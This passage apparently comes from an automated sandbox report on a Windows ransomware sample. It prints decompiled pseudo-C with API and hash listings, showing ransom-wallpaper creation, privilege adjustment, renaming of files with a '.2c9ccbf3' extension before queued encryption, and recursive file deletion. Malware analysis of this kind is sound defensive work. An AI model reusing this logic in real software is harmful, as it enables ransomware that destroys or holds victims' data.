                                                                                        													_v92.top = (_v44 >> 1) - (_v64.cy << 1);
                                                                                        													_v92.right = _v48;
                                                                                        													_v92.bottom = _v44;
                                                                                        													if(DrawTextW(_v24, _v56, _t262,  &_v92, 0x211) != 0) {
                                                                                        														memset( &_v136, 0, 0x2c);
                                                                                        														_v136 = 0x28;
                                                                                        														_v122 = 0x10;
                                                                                        														_v120 = 0;
                                                                                        														_t217 = _v48;
                                                                                        														_v132 = _t217;
                                                                                        														_t268 = _v44;
                                                                                        														_v128 = _t268;
                                                                                        														_v124 = 1;
                                                                                        														_v116 = _t217 * _t268 * ((_v122 & 0x0000ffff) + 7 >> 3);
                                                                                        														_v152 = 0x4d42;
                                                                                        														_v142 = 0x36;
                                                                                        														_v150 = 0x36 + _v116;
                                                                                        														_v146 = 0;
                                                                                        														_v144 = 0;
                                                                                        														_v72 =  *0x40f86c(_v24,  &_v136, 0,  &_v76, 0, 0);
                                                                                        														if(_v72 != 0) {
                                                                                        															SelectObject(_v28, _v72);
                                                                                        															_push(0xcc0020);
                                                                                        															_push(0);
                                                                                        															_push(0);
                                                                                        															_push(_v24);
                                                                                        															_push(_v128);
                                                                                        															_push(_v132);
                                                                                        															_push(0);
                                                                                        															_push(0);
                                                                                        															_push(_v28);
                                                                                        															if( *0x40f858() != 0) {
                                                                                        																 *0x40f8b8(0, _v56, 0x23, 0);
                                                                                        																E00401A3A(_v56);
                                                                                        																_t263 = _v56;
                                                                                        																wcscat(_t263, 0x40f5fe);
                                                                                        																_t232 = _t263 + wcslen(_t263) * 2;
                                                                                        																 *_t232 = 0x42002e;
                                                                                        																 *((intOrPtr*)(_t232 + 4)) = 0x50004d;
                                                                                        																 *((short*)(_t232 + 8)) = 0;
                                                                                        																_v8 = CreateFileW(_v56, 0x40000000, 0, 0, 4, 0x80, 0);
                                                                                        																if(_v8 != 0xffffffff) {
                                                                                        																	if(WriteFile(_v8,  &_v152, 0xe,  &_v16, 0) != 0) {
                                                                                        																		if(WriteFile(_v8,  &_v136, 0x28,  &_v16, 0) != 0) {
                                                                                        																			if(WriteFile(_v8, _v76, _v116,  &_v16, 0) != 0) {
                                                                                        																				NtClose(_v8);
                                                                                        																				_v8 = 0;
                                                                                        																				_v32 = E00401D08(0x40d009);
                                                                                        																				_v36 = E00401D08(0x40d039);
                                                                                        																				_v40 = E00401D08(0x40d051);
                                                                                        																				if(E00403303( *0x40f5ea,  &_v684) != 0) {
                                                                                        																					E00401A3A( &_v684);
                                                                                        																					wcscat( &_v684, _v32);
                                                                                        																					if(RegCreateKeyExW(0x80000003,  &_v684, 0, 0, 0, 0x20106, 0,  &_v12, 0) == 0) {
                                                                                        																						if(RegSetValueExW(_v12, _v36, 0, 1, _v56, 2 + wcslen(_v56) * 2) == 0) {
                                                                                        																							_t280 =  &_v164;
                                                                                        																							 *_t280 = 0x300031;
                                                                                        																							_t280[1] = 0;
                                                                                        																							_t259 = RegSetValueExW(_v12, _v40, 0, 1, _t280, 2 + wcslen(_t280) * 2);
                                                                                        																							if(_t259 == 0) {
                                                                                        																								_t259 = SystemParametersInfoW(0x14, 0, _v56, 3);
                                                                                        																							}
                                                                                        																						}
                                                                                        																					}
                                                                                        																				}
                                                                                        																			}
                                                                                        																		}
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v40 != 0) {
                                                                                        					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v40);
                                                                                        				}
                                                                                        				if(_v36 != 0) {
                                                                                        					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v36);
                                                                                        				}
                                                                                        				if(_v32 != 0) {
                                                                                        					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        				}
                                                                                        				if(_v12 != 0) {
                                                                                        					_t259 = NtClose(_v12);
                                                                                        				}
                                                                                        				if(_v8 != 0 && _v8 != 0xffffffff) {
                                                                                        					_t259 = NtClose(_v8);
                                                                                        				}
                                                                                        				if(_v72 != 0) {
                                                                                        					_t259 = DeleteObject(_v72);
                                                                                        				}
                                                                                        				if(_v68 != 0) {
                                                                                        					_t259 = DeleteObject(_v68);
                                                                                        				}
                                                                                        				if(_v56 != 0) {
                                                                                        					_t259 = RtlFreeHeap( *0x40f5d6, 0, _v56);
                                                                                        				}
                                                                                        				if(_v52 != 0) {
                                                                                        					_t259 = DeleteObject(_v52);
                                                                                        				}
                                                                                        				if(_v28 != 0) {
                                                                                        					_t259 = DeleteDC(_v28);
                                                                                        				}
                                                                                        				if(_v24 != 0) {
                                                                                        					_t259 = DeleteDC(_v24);
                                                                                        				}
                                                                                        				if(_v20 != 0) {
                                                                                        					return  *0x40f830(0, _v20);
                                                                                        				}
                                                                                        				return _t259;
                                                                                        			}
                                                                                        0x00403924
                                                                                        0x00403924
                                                                                        0x0040392e
                                                                                        0x0040393b
                                                                                        0x0040393b
                                                                                        0x00403945
                                                                                        0x0040394a
                                                                                        0x0040394a
                                                                                        0x00403954
                                                                                        0x0040395f
                                                                                        0x0040395f
                                                                                        0x00403969
                                                                                        0x0040396e
                                                                                        0x0040396e
                                                                                        0x00403978
                                                                                        0x0040397d
                                                                                        0x0040397d
                                                                                        0x00403987
                                                                                        0x00403994
                                                                                        0x00403994
                                                                                        0x0040399e
                                                                                        0x004039a3
                                                                                        0x004039a3
                                                                                        0x004039ad
                                                                                        0x004039b2
                                                                                        0x004039b2
                                                                                        0x004039bc
                                                                                        0x004039c1
                                                                                        0x004039c1
                                                                                        0x004039cb
                                                                                        0x00000000
                                                                                        0x004039d2
                                                                                        0x004039e0

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040390D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403924
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040393B
                                                                                        • NtClose.NTDLL(00000000), ref: 0040394A
                                                                                        • NtClose.NTDLL(000000FF), ref: 0040395F
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040396E
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040397D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403994
                                                                                        • DeleteObject.GDI32(00000000), ref: 004039A3
                                                                                        • DeleteDC.GDI32(00000000), ref: 004039B2
                                                                                        • DeleteDC.GDI32(00000000), ref: 004039C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Delete$FreeHeap$Object$Close
                                                                                        • String ID: ($.2c9ccbf3$BM
                                                                                        • API String ID: 2191992596-3314121166
                                                                                        • Opcode ID: 1d5de879dda802f6a9ee81b5fad0ed478d03724a460d7234c1951c06fe82c685
                                                                                        • Instruction ID: f98b427fced668d8329bf44421bf58694601528c6b1d165154df31b2355271e3
                                                                                        • Opcode Fuzzy Hash: 1d5de879dda802f6a9ee81b5fad0ed478d03724a460d7234c1951c06fe82c685
                                                                                        • Instruction Fuzzy Hash: 4C020771900208EFEB21AFA0ED09BAEBFB9FB04706F104076F501B61E1D7B55A59DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                        			E00408BD6(wchar_t* _a4) {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        				char _v16;
                                                                                        				char _v26;
                                                                                        				long _v44;
                                                                                        				signed int _t80;
                                                                                        				void* _t82;
                                                                                        				intOrPtr* _t83;
                                                                                        				wchar_t* _t85;
                                                                                        				signed int _t88;
                                                                                        				void* _t89;
                                                                                        				wchar_t* _t94;
                                                                                        				void* _t99;
                                                                                        				void* _t100;
                                                                                        				void* _t101;
                                                                                        				void* _t102;
                                                                                        				void* _t104;
                                                                                        				wchar_t* _t109;
                                                                                        				void* _t114;
                                                                                        				void* _t115;
                                                                                        				void* _t116;
                                                                                        				void* _t117;
                                                                                        				intOrPtr* _t118;
                                                                                        				void* _t119;
                                                                                        				void* _t120;
                                                                                        				void* _t122;
                                                                                        				long* _t124;
                                                                                        				void* _t127;
                                                                                        				wchar_t* _t129;
                                                                                        				wchar_t* _t130;
                                                                                        				wchar_t* _t131;
                                                                                        				void* _t132;
                                                                                        				void* _t133;
                                                                                        				short* _t134;
                                                                                        				void* _t135;
                                                                                        				void* _t136;
                                                                                        				void* _t137;
                                                                                        				void* _t138;
                                                                                        
                                                                                        				 *0x40f6bc(0x80000001,  &_v16);
                                                                                        				E00402160();
                                                                                        				_v8 = 0;
                                                                                        				_t80 = wcslen(_a4);
                                                                                        				_t136 = _t135 + 4;
                                                                                        				_t82 = RtlAllocateHeap( *0x40f5d6, 8, 0xa + _t80 * 2);
                                                                                        				_v12 = _t82;
                                                                                        				if(_v12 != 0) {
                                                                                        					_t83 =  &_v44;
                                                                                        					 *_t83 = 0x6f0056;
                                                                                        					 *((intOrPtr*)(_t83 + 4)) = 0x75006c;
                                                                                        					 *((intOrPtr*)(_t83 + 8)) = 0x65006d;
                                                                                        					 *((intOrPtr*)(_t83 + 0xc)) = 0x7b;
                                                                                        					_t85 = wcsstr(_a4,  &_v44);
                                                                                        					_t137 = _t136 + 8;
                                                                                        					_t129 = _t85;
                                                                                        					__eflags = _t129;
                                                                                        					if(_t129 == 0) {
                                                                                        						wcscpy(_v12, _a4);
                                                                                        						_t138 = _t137 + 8;
                                                                                        						E00401A67(_v12);
                                                                                        						while(1) {
                                                                                        							L8:
                                                                                        							_t88 = GetFileAttributesW(_v12);
                                                                                        							__eflags = _t88 - 0xffffffff;
                                                                                        							if(_t88 == 0xffffffff) {
                                                                                        								break;
                                                                                        							}
                                                                                        							__eflags = _t88 & 0x00000010;
                                                                                        							if((_t88 & 0x00000010) != 0) {
                                                                                        								_t89 = PathIsNetworkPathW(_v12);
                                                                                        								__eflags = _t89;
                                                                                        								if(_t89 == 0) {
                                                                                        									L50:
                                                                                        									__eflags =  *0x40f5a2;
                                                                                        									if(__eflags != 0) {
                                                                                        										E004039E3(__eflags, ".2c9ccbf3");
                                                                                        									}
                                                                                        									return E00407D2C(_v8, _v12);
                                                                                        								}
                                                                                        								__eflags = _v12 - 0x5c005c;
                                                                                        								if(_v12 != 0x5c005c) {
                                                                                        									goto L50;
                                                                                        								}
                                                                                        								_t94 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen(_v12) * 2);
                                                                                        								_t130 = _t94;
                                                                                        								__eflags = _t130;
                                                                                        								if(_t130 != 0) {
                                                                                        									 *_t130 = 0x5c005c;
                                                                                        									_t130[1] = 0x5c003f;
                                                                                        									_t130[2] = 0x4e0055;
                                                                                        									_t130[3] = 0x5c0043;
                                                                                        									wcscat(_t130, _v12 + 4);
                                                                                        									RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        									_v12 = _t130;
                                                                                        									__eflags =  *0x40f5e6;
                                                                                        									if( *0x40f5e6 == 0) {
                                                                                        										__eflags =  *0x40f5ea;
                                                                                        										if( *0x40f5ea != 0) {
                                                                                        											_t101 =  *0x40f5ea; // 0x0
                                                                                        											_v8 = _t101;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t102 =  *0x40f5e6; // 0x0
                                                                                        										_v8 = _t102;
                                                                                        									}
                                                                                        									while(1) {
                                                                                        										_t99 = E0040303D(_v8, _v12);
                                                                                        										__eflags = _t99;
                                                                                        										if(_t99 != 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t100 = E004030A1(_v12);
                                                                                        										__eflags = _t100;
                                                                                        										if(_t100 == 0) {
                                                                                        											return _t100;
                                                                                        										}
                                                                                        									}
                                                                                        									_t73 =  &_v12;
                                                                                        									 *_t73 = _v12 + 8;
                                                                                        									__eflags =  *_t73;
                                                                                        									goto L50;
                                                                                        								}
                                                                                        								return _t94;
                                                                                        							}
                                                                                        							_t134 = PathFindExtensionW(_v12);
                                                                                        							__eflags =  *_t134;
                                                                                        							if( *_t134 == 0) {
                                                                                        								L20:
                                                                                        								_t104 = PathIsNetworkPathW(_v12);
                                                                                        								__eflags = _t104;
                                                                                        								if(_t104 == 0) {
                                                                                        									L33:
                                                                                        									__eflags =  *0x40f5a2;
                                                                                        									if(__eflags != 0) {
                                                                                        										E004039E3(__eflags, ".2c9ccbf3");
                                                                                        									}
                                                                                        									return E00407D2C(_v8, _v12);
                                                                                        								}
                                                                                        								_t109 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen(_v12) * 2);
                                                                                        								_t131 = _t109;
                                                                                        								__eflags = _t131;
                                                                                        								if(_t131 != 0) {
                                                                                        									 *_t131 = 0x5c005c;
                                                                                        									_t131[1] = 0x5c003f;
                                                                                        									_t131[2] = 0x4e0055;
                                                                                        									_t131[3] = 0x5c0043;
                                                                                        									wcscat(_t131, _v12 + 4);
                                                                                        									RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        									_v12 = _t131;
                                                                                        									__eflags =  *0x40f5e6;
                                                                                        									if( *0x40f5e6 == 0) {
                                                                                        										__eflags =  *0x40f5ea;
                                                                                        										if( *0x40f5ea != 0) {
                                                                                        											_t116 =  *0x40f5ea; // 0x0
                                                                                        											_v8 = _t116;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t117 =  *0x40f5e6; // 0x0
                                                                                        										_v8 = _t117;
                                                                                        									}
                                                                                        									while(1) {
                                                                                        										_t114 = E0040303D(_v8, _v12);
                                                                                        										__eflags = _t114;
                                                                                        										if(_t114 != 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t115 = E004030A1(_v12);
                                                                                        										__eflags = _t115;
                                                                                        										if(_t115 == 0) {
                                                                                        											return _t115;
                                                                                        										}
                                                                                        									}
                                                                                        									_t52 =  &_v12;
                                                                                        									 *_t52 = _v12 + 8;
                                                                                        									__eflags =  *_t52;
                                                                                        									goto L33;
                                                                                        								}
                                                                                        								return _t109;
                                                                                        							}
                                                                                        							_t118 =  &_v26;
                                                                                        							 *_t118 = 0x6c002e;
                                                                                        							 *((intOrPtr*)(_t118 + 4)) = 0x6b006e;
                                                                                        							 *((short*)(_t118 + 8)) = 0;
                                                                                        							_t119 =  *0x40f694(_t134, _t118);
                                                                                        							_t138 = _t138 + 8;
                                                                                        							__eflags = _t119;
                                                                                        							if(_t119 != 0) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t120 = E00403BB0(_v12);
                                                                                        							_t132 = _t120;
                                                                                        							__eflags = _t132;
                                                                                        							if(_t132 != 0) {
                                                                                        								RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        								_v12 = _t132;
                                                                                        								continue;
                                                                                        							}
                                                                                        							return _t120;
                                                                                        						}
                                                                                        						_t122 = PathIsUNCServerW(_v12);
                                                                                        						__eflags = _t122;
                                                                                        						if(_t122 != 0) {
                                                                                        							__eflags =  *0x40f5a2;
                                                                                        							if(__eflags != 0) {
                                                                                        								E004039E3(__eflags, ".2c9ccbf3");
                                                                                        							}
                                                                                        							_t122 = E00407B27(_v12);
                                                                                        						}
                                                                                        						return _t122;
                                                                                        					}
                                                                                        					_t124 = _v12;
                                                                                        					 *_t124 = 0x5c005c;
                                                                                        					_t124[1] = 0x5c003f;
                                                                                        					wcscat(_v12, _t129);
                                                                                        					_t138 = _t137 + 8;
                                                                                        					E00401A3A(_v12);
                                                                                        					_t127 = E00406B24(_v12);
                                                                                        					_t133 = _t127;
                                                                                        					__eflags = _t133;
                                                                                        					if(_t133 != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        						_v12 = _t133;
                                                                                        						goto L8;
                                                                                        					}
                                                                                        					return _t127;
                                                                                        				}
                                                                                        				return _t82;
			}

                                                                                        APIs
                                                                                        • NtSetThreadExecutionState.NTDLL(80000001,?), ref: 00408BE5
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        • wcslen.NTDLL ref: 00408BFA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408C13
                                                                                        • wcsstr.NTDLL ref: 00408C4C
                                                                                        • wcscat.NTDLL ref: 00408C6F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Token$Heap$AllocateInformationQuery$AdjustCloseExecutionFreeOpenPrivilegesProcessStateThreadwcscatwcslenwcsstr
                                                                                        • String ID: .2c9ccbf3$?$C$U$\
                                                                                        • API String ID: 3053807181-3748697195
                                                                                        • Opcode ID: 078ebafd70b42fcacea6869c3e9a1d14b17f30670e346fc792a3d5901da94a1c
                                                                                        • Instruction ID: 06576c32b97e3fdf99f41b85b7d7e25d8334b109ddc247418aeea4ccdaf4cb49
                                                                                        • Opcode Fuzzy Hash: 078ebafd70b42fcacea6869c3e9a1d14b17f30670e346fc792a3d5901da94a1c
                                                                                        • Instruction Fuzzy Hash: 36A16D70500209EFDB219FA0DE48B9D7FB5BF04305F10407AE945B62B1DB798A99DB1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 98%
                                                                                        			E00405E35(wchar_t* _a4, intOrPtr _a8, long _a12, char _a16) {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				void* _v20;
                                                                                        				void* __edx;
                                                                                        				int _t72;
                                                                                        				void* _t91;
                                                                                        				void* _t105;
                                                                                        				void* _t115;
                                                                                        				long _t117;
                                                                                        				signed int _t121;
                                                                                        				long _t122;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v20 = 0;
                                                                                        				if(_a12 != 0 || _a8 != 0) {
                                                                                        					_t72 = wcslen(_a4);
                                                                                        					_t7 =  &_a16; // 0x406937
                                                                                        					_t121 = _t72 + wcslen( *_t7);
                                                                                        					_t122 = 0x16 + _t121 * 2;
                                                                                        					_v16 = RtlAllocateHeap( *0x40f5d6, 8, 4 + _t121 * 2);
                                                                                        					if(_v16 != 0) {
                                                                                        						_t14 =  &_a16; // 0x406937
                                                                                        						wcscpy(_v16,  *_t14);
                                                                                        						E00401A3A(_v16);
                                                                                        						wcscat(_v16, _a4);
                                                                                        						if(E00405C1C(_v16) == 0) {
                                                                                        							_v20 = RtlAllocateHeap( *0x40f5d6, 8, _t122);
                                                                                        							if(_v20 != 0) {
                                                                                        								wcscpy(_v20, _v16);
                                                                                        								wcscat(_v20, ".2c9ccbf3");
                                                                                        								MoveFileExW(_v16, _v20, 8);
                                                                                        								_v12 = CreateFileW(_v20, 0xc0000000, 0, 0, 3, 0xca000000, 0);
                                                                                        								if(_v12 != 0xffffffff) {
                                                                                        									if(CreateIoCompletionPort(_v12,  *0x40f9e8, 0, 0) != 0) {
                                                                                        										_t115 = RtlAllocateHeap( *0x40f5d6, 8, 0x80104);
                                                                                        										if(_t115 != 0) {
                                                                                        											 *(_t115 + 0x30) = 0;
                                                                                        											 *((intOrPtr*)(_t115 + 0x2c)) = _v12;
                                                                                        											if( *0x40f590 != 1) {
                                                                                        												if( *0x40f590 != 2) {
                                                                                        													 *((intOrPtr*)(_t115 + 0x28)) = 1;
                                                                                        													 *((intOrPtr*)(_t115 + 0x24)) = 1;
                                                                                        													_t117 = _a12;
                                                                                        													_t91 = E0040611D(_t117);
                                                                                        													asm("adc edx, 0x0");
                                                                                        													 *(_t115 + 0x1c) = _t91 + 0x80000;
                                                                                        													 *(_t115 + 0x20) = _t117;
                                                                                        												} else {
                                                                                        													 *((intOrPtr*)(_t115 + 0x28)) = 1;
                                                                                        													 *((intOrPtr*)(_t115 + 0x24)) = 1;
                                                                                        													 *(_t115 + 0x1c) = 0xffffffff;
                                                                                        													 *(_t115 + 0x20) = 0xffffffff;
                                                                                        												}
                                                                                        											} else {
                                                                                        												 *((intOrPtr*)(_t115 + 0x28)) = 1;
                                                                                        												 *((intOrPtr*)(_t115 + 0x24)) = 1;
                                                                                        												 *(_t115 + 0x1c) = 0x80000;
                                                                                        												 *(_t115 + 0x20) = 0;
                                                                                        											}
                                                                                        											 *(_t115 + 0xbc) =  *(_t115 + 0x1c);
                                                                                        											 *(_t115 + 0xc0) =  *(_t115 + 0x20);
                                                                                        											 *((intOrPtr*)(_t115 + 0xb4)) = _a8;
                                                                                        											 *(_t115 + 0xb8) = _a12;
                                                                                        											_t58 = _t115 + 0x34; // 0x34
                                                                                        											E00404A52(_t58);
                                                                                        											_t59 = _t115 + 0x34; // 0x34
                                                                                        											_t60 = _t115 + 0x74; // 0x74
                                                                                        											memcpy(_t60, _t59, 0x40);
                                                                                        											_t62 = _t115 + 0x74; // 0x74
                                                                                        											E0040511B(_t62, 0x40f470, 0x40f4f0);
                                                                                        											_t63 = _t115 + 0x74; // 0x74
                                                                                        											_t105 = E00401060(_t63, 0x80, 0);
                                                                                        											_t64 = _t115 + 0xf4; // 0xf4
                                                                                        											memcpy(_t64, _t105, 0x10);
                                                                                        											if(PostQueuedCompletionStatus( *0x40f9e8, 0, 0, _t115) != 0) {
                                                                                        												InterlockedIncrement(0x40f9ec);
                                                                                        												_v8 = 1;
                                                                                        											} else {
                                                                                        												RtlFreeHeap( *0x40f5d6, 0, _t115);
                                                                                        												NtClose(_v12);
                                                                                        											}
                                                                                        										} else {
                                                                                        											NtClose(_v12);
                                                                                        										}
                                                                                        									} else {
                                                                                        										NtClose(_v12);
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v16 != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        				}
                                                                                        				if(_v20 != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        				}
                                                                                        				return _v8;
                                                                                        			}

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00405E68
                                                                                        • wcslen.NTDLL ref: 00405E76
                                                                                        • RtlAllocateHeap.NTDLL(00000008), ref: 00405E98
                                                                                        • wcscpy.NTDLL ref: 00405EB1
                                                                                        • wcscat.NTDLL ref: 00405EC8
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00405EEA
                                                                                        • wcscpy.NTDLL ref: 00405F03
                                                                                        • wcscat.NTDLL ref: 00405F14
                                                                                        • MoveFileExW.KERNEL32(00000000,00000000,00000008), ref: 00405F25
                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,CA000000,00000000), ref: 00405F40
                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000), ref: 00405F61
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405F6E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00080104), ref: 00405F86
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405F95
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004060F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406109
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Allocate$CloseCreateFileFreewcscatwcscpywcslen$CompletionMovePort
                                                                                        • String ID: .2c9ccbf3$7i@
                                                                                        • API String ID: 3849767442-808895345
                                                                                        • Opcode ID: d80a8b62539f20cdfa3ba579f7fffa61cd97d2d289079b7a4f43672732282450
                                                                                        • Instruction ID: d64980988642996bc52c138ed99c137cb337b3e5925c0458dab4666810768f6e
                                                                                        • Opcode Fuzzy Hash: d80a8b62539f20cdfa3ba579f7fffa61cd97d2d289079b7a4f43672732282450
                                                                                        • Instruction Fuzzy Hash: B08169B0940204EFDF209F60DD89B8A3BB4FB04305F104175F915BA6E2DB7A9969CF49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040409F(wchar_t* _a4) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				wchar_t* _v16;
                                                                                        				void* _v20;
                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                        				int _t46;
                                                                                        				int _t56;
                                                                                        				int _t57;
                                                                                        				wchar_t* _t70;
                                                                                        				void* _t74;
                                                                                        				void* _t75;
                                                                                        				void* _t77;
                                                                                        
                                                                                        				_v16 = 0;
                                                                                        				_v20 = 0;
                                                                                        				_t46 = wcslen(_a4);
                                                                                        				_t75 = _t74 + 4;
                                                                                        				if(_t46 == 0) {
                                                                                        					L17:
                                                                                        					return _t46;
                                                                                        				}
                                                                                        				_t46 = RtlAllocateHeap( *0x40f5d6, 8, 6 + _t46 * 2);
                                                                                        				_v16 = _t46;
                                                                                        				if(_v16 == 0) {
                                                                                        					L13:
                                                                                        					if(_v16 != 0) {
                                                                                        						_t46 = RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        					}
                                                                                        					if(_v20 == 0) {
                                                                                        						goto L17;
                                                                                        					} else {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        					}
                                                                                        				}
                                                                                        				wcscpy(_v16, _a4);
                                                                                        				E00401A3A(_v16);
                                                                                        				_v12 = 0x2a;
                                                                                        				wcscat(_v16,  &_v12);
                                                                                        				_t77 = _t75 + 0x10;
                                                                                        				_t46 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, 0);
                                                                                        				_v8 = _t46;
                                                                                        				if(_v8 == 0xffffffff) {
                                                                                        					goto L13;
                                                                                        				} else {
                                                                                        					goto L3;
                                                                                        				}
                                                                                        				do {
                                                                                        					L3:
                                                                                        					_t70 =  &(_v612.cFileName);
                                                                                        					if( *_t70 != 0x2e &&  *_t70 != 0x2e002e) {
                                                                                        						_t56 = wcslen(_t70);
                                                                                        						_t57 = wcslen(_v16);
                                                                                        						_t77 = _t77 + 8;
                                                                                        						_v20 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t56 + _t57) * 2);
                                                                                        						if(_v20 != 0) {
                                                                                        							wcscpy(_v20, _v16);
                                                                                        							wcscpy(wcsrchr(_v20, 0x2a),  &(_v612.cFileName));
                                                                                        							_t77 = _t77 + 0x18;
                                                                                        							if((GetFileAttributesW(_v20) & 0x00000010) == 0) {
                                                                                        								DeleteFileW(_v20);
                                                                                        								RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        								_v20 = 0;
                                                                                        							} else {
                                                                                        								if(E00401B91(_v20) == 0) {
                                                                                        									E0040409F(_v20);
                                                                                        								}
                                                                                        								RemoveDirectoryW(_v20);
                                                                                        								RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        								_v20 = 0;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} while (FindNextFileW(_v8,  &_v612) != 0);
                                                                                        				_t46 = FindClose(_v8);
                                                                                        				goto L13;
                                                                                        			}
                                                                                        0x00404215
                                                                                        0x00404226
                                                                                        0x0040422c
                                                                                        0x004041db
                                                                                        0x004041e5
                                                                                        0x004041ea
                                                                                        0x004041ea
                                                                                        0x004041f2
                                                                                        0x00404203
                                                                                        0x00404209
                                                                                        0x00404209
                                                                                        0x004041d9
                                                                                        0x00404197
                                                                                        0x00404243
                                                                                        0x0040424e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 004040BE
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004040DF
                                                                                        • wcscpy.NTDLL ref: 004040F8
